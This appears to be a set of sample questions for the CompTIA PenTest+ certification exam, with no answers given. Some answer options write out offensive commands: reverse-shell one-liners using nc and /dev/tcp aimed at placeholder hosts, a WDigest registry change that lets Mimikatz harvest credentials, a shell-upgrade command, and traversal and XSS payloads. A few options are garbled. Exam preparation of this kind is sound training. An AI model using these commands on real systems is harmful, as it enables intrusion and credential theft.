Free PT0-001 Sample Questions — CompTIA PenTest+ Certification Exam

After several attempts, an attacker was able to gain unauthorized access through a biometrics sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?

• A. The biometric device is tuned more toward false positives
• B. The biometric device is configured more toward true negatives
• C. The biometric device is set to fail closed
• D. The biometric device duplicated a valid user's fingerprint

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

• A. Transition the application to another port
• B. Filter port 443 to specific IP addresses
• C. Implement a web application firewall
• D. Disable unneeded services

The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?

• A. """"min-rate
• B. """"max-length
• C. """"host-timeout
• D. """"max-rate

A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

• A. The latest vulnerability scan results
• B. list of sample application requests
• C. An up-to-date list of possible exploits
• D. list of sample test accounts

A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

• A. Run the application through a dynamic code analyzer
• B. Employ a fuzzing utility
• C. Decompile the application
• D. Check memory allocations

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

• A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
• B. ssh superadmin@<DESTINATIONIP> -p 443
• C. nc -e /bin/sh <SOURCEIP> 443
• D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

• A. Expand the password length from seven to 14 characters
• B. Implement password history restrictions
• C. Configure password filters/
• D. Disable the accounts after five incorrect attempts
• E. Decrease the password expiration window

A penetration tester runs the following from a compromised ` ̃python -c ` ̃ import pty;pty.spawn (`/bin/bash`) '. Which of the following actions are the tester taking?

• A. Removing the Bash history
• B. Upgrading the shell
• C. Creating a sandbox
• D. Capturing credentials

During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz. Which of the following registry changes would allow for credential caching in memory?

• A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
• B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
• C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
• D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

• A. Ensure the scanner can make outbound DNS requests
• B. Ensure the scanner is configured to perform ARP resolution
• C. Ensure the scanner is configured to analyze IP hosts
• D. Ensure the scanner has the proper plug -ins loaded

At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

• A. Enumeration of services
• B. OSINT gathering
• C. Port scanning
• D. Social engineering

When performing compliance-based assessments, which of the following is the MOST important key consideration?

• A. Additional rate
• B. Company policy
• C. Impact tolerance
• D. Industry type

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

• A. Enable HTTP Strict Transport Security
• B. Enable a secure cookie flag
• C. Encrypt the communication channel
• D. Sanitize invalid user input

A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have helped the penetration tester identify this vulnerability?

• A. 'or 'folder' like 'file'; """"
• B. || is /tmp/
• C. "><script>document.location=/root/</script>
• D. && dir C:/
• E. /../../../../../../../

A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?

• A. Manually run publicly available exploit code
• B. Confirm via evidence of the updated version number
• C. Run the vulnerability scanner again
• D. Perform dynamic analysis on the vulnerable service

A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?

• A. Script kiddies
• B. APT actors
• C. Insider threats
• D. Hacktivist groups

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

• A. Cleartext exposure of SNMP trap data
• B. Software bugs resident in the IT ticketing system
• C. S/MIME certificate templates defined by the CA
• D. Health information communicated over HTTP
• E. DAR encryption on records servers

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

• A. LSASS
• B. SAM database
• C. Active Directory
• D. Registry

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

• A. Selection of the appropriate set of security testing tools
• B. Current and load ratings of the ICS components
• C. Potential operational and safety hazards
• D. Electrical certification of hardware used in the test

A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

• A. TCP SYN flood
• B. SQL injection
• C. XSS
• D. XMAS scan